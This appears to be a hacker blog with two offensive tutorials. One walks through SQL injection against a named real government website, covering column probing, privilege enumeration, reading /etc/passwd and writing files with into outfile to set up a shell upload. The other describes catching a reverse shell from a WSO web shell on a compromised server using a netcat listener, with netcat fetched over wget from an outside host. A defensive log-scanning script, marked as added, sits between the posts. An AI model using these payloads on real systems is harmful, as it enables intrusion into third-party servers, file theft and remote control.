Thursday, December 24, 2015

SQLi Challenge Solution 2

Okay, first, hello to all :p .. The method used in this challenge is the root privileges method.

Okay then, let's start:

1. First of all, we'll check whether the site is vulnerable or not.

http://www.police.gov.bd/content.php?id=275' > Error :D The text disappeared, which means it's vulnerable

2. Now it's time to find which comment works.

http://www.police.gov.bd/content.php?id=275 order by 2222222-- > No error, which means we now have to try string-based SQLi

http://www.police.gov.bd/content.php?id=275' order by 222222--+ > Error :D It's working

2. Now we have to dump the vulnerable columns.

http://www.police.gov.bd/content.php?id=275' order by 20--+ > error
http://www.police.gov.bd/content.php?id=275' order by 15--+ > No error
http://www.police.gov.bd/content.php?id=275' order by 17--+ > Error
http://www.police.gov.bd/content.php?id=275' order by 16--+ > No error

So, the total number of columns is 16.

Now we have to dump the columns.

http://www.police.gov.bd/content.php?id=275' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--+ > The vulnerable column is 3

3. Now we have to see whether the website has root privileges or not.

To check, we use this query:

(SELECT+GROUP_CONCAT(GRANTEE,0x202d3e20,IS_GRANTABLE,0x3c62723e)+FROM+INFORMATION_SCHEMA.USER_PRIVILEGES)

Use it in the vulnerable column.

http://www.police.gov.bd/content.php?id=275' union select 1,2,(SELECT+GROUP_CONCAT(GRANTEE,0x202d3e20,IS_GRANTABLE,0x3c62723e)+FROM+INFORMATION_SCHEMA.USER_PRIVILEGES),4,5,6,7,8,9,10,11,12,13,14,15,16--+

Yeahhhh :D It's showing root@localhost > Yes, it means we have root privileges access.

4. Now we have to check the website path to upload a shell.

User paths exist in the passwd file, so we'll load that file to see the path. For this we'll use the following command:

load_file('/etc/passwd')

http://www.police.gov.bd/content.php?id=275' union select 1,2,load_file('/etc/passwd'),4,5,6,7,8,9,10,11,12,13,14,15,16--+

:'( No luck, no path there

5. If you aren't able to find the path, then remember the tmp dir is always writable ^_^

To upload a file to the tmp folder, we'll use the following command:

into outfile '/tmp/test.txt'

http://www.police.gov.bd/content.php?id=275' union select 1,2,'Testing',4,5,6,7,8,9,10,11,12,13,14,15,16 into outfile '/tmp/test.txt'--+

6. To open your uploaded file, we'll use load_file.

http://www.police.gov.bd/content.php?id=275' union select 1,2,load_file('/tmp/test.txt'),4,5,6,7,8,9,10,11,12,13,14,15,16--+

Wahoooooo :)))) It's working .....

Hope you like my tutorial (solution of the 2nd challenge).

#D4RK_4NG31
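
For defenders: the request sequence in this walkthrough leaves a recognizable trail in web access logs. The following added example (not part of the original post) decodes each logged query string and labels the stage it matches; the log format, client addresses, the /search.php path and all function names are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Signatures mirror the requests in the walkthrough, in escalation order.
STAGES = [
    ("column_count", re.compile(r"\border by \d+")),
    ("union_probe", re.compile(r"\bunion (all )?select\b")),
    ("privilege_enum", re.compile(r"\binformation_schema\.user_privileges\b")),
    ("file_read", re.compile(r"\bload_file ?\(")),
    ("file_write", re.compile(r"\binto outfile\b")),
]
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def normalize(value):
    """Lowercase, replace SQL inline comments with spaces, collapse whitespace."""
    value = re.sub(r"/\*.*?\*/", " ", value.lower(), flags=re.S)
    return re.sub(r"\s+", " ", value)

def classify(url):
    """Return the stage names found in the decoded query parameters of url."""
    hits = []
    for _, raw in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        text = normalize(raw)
        hits += [n for n, rx in STAGES if n not in hits and rx.search(text)]
    return hits

def scan(log_lines):
    """Map each client address to the stages it triggered, in first-seen order."""
    seen = {}
    for line in log_lines:
        m = REQUEST.match(line)
        for stage in (classify(m.group(2)) if m else []):
            seen.setdefault(m.group(1), {})[stage] = True
    return {ip: list(stages) for ip, stages in seen.items()}

def needs_escalation(stages):
    """File access attempts: review the DB account's FILE privilege and secure_file_priv."""
    return bool({"file_read", "file_write"} & set(stages))

# Constructed sample log lines (documentation addresses, hypothetical paths).
LINE = '{} - - [24/Dec/2015:10:00:00 +0000] "GET {} HTTP/1.1" 200 512'
SAMPLE = [LINE.format(ip, url) for ip, url in [
    ("203.0.113.7", "/content.php?id=275%27+order+by+16--+"),
    ("203.0.113.7", "/content.php?id=275%27+union+select+1,2,load_file(%27/etc/passwd%27)--+"),
    ("203.0.113.7", "/content.php?id=275%27+union+select+1,2,%27x%27+into+outfile+%27/tmp/test.txt%27--+"),
    ("198.51.100.9", "/search.php?q=order+by+mail"),
]]
if __name__ == "__main__":
    print({ip: (s, needs_escalation(s)) for ip, s in scan(SAMPLE).items()})
```

A match records an attempt, not a success; a client that reaches the file_read or file_write stage is the one to correlate with database and filesystem evidence.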

Sunday, December 13, 2015

BackConnect Without Router

Hello guys! I know many people want to root a server but their internet doesn't forward ports :)

But now you can backconnect with any internet connection.

So, just follow me:

1. Make account on koding.com

2. Build a VM. It'll take time.

3. Upload NetCat to the VM with wget in the terminal. Command: wget -O netcat.zip http://anonpirates.ml/netcat-1.11.zip

4. Now unzip netcat with this command: unzip netcat.zip
"Hurray! We installed NetCat successfully :)"

5. Now execute this command: nc -lvp 1337

6. Now you'll see "koding-vm-0" written in the top left, and in that option you'll see a settings button.

7. Click on the settings button and there you'll see the Public IP. Copy that IP.

8. Now go to the server that you want to backconnect.

9. Click on Network (WSO Shell), paste the Public IP in IP, write 1337 in port and then click on connect.

10. Now go back to the VM to see whether it's connected or not. Execute this command: ls (to check)

Yahooooooooo! :D We successfully backconnected the server

Hope you like my tutorial. Thanks to Kashmiri Cheetah

#D4RK_4NG31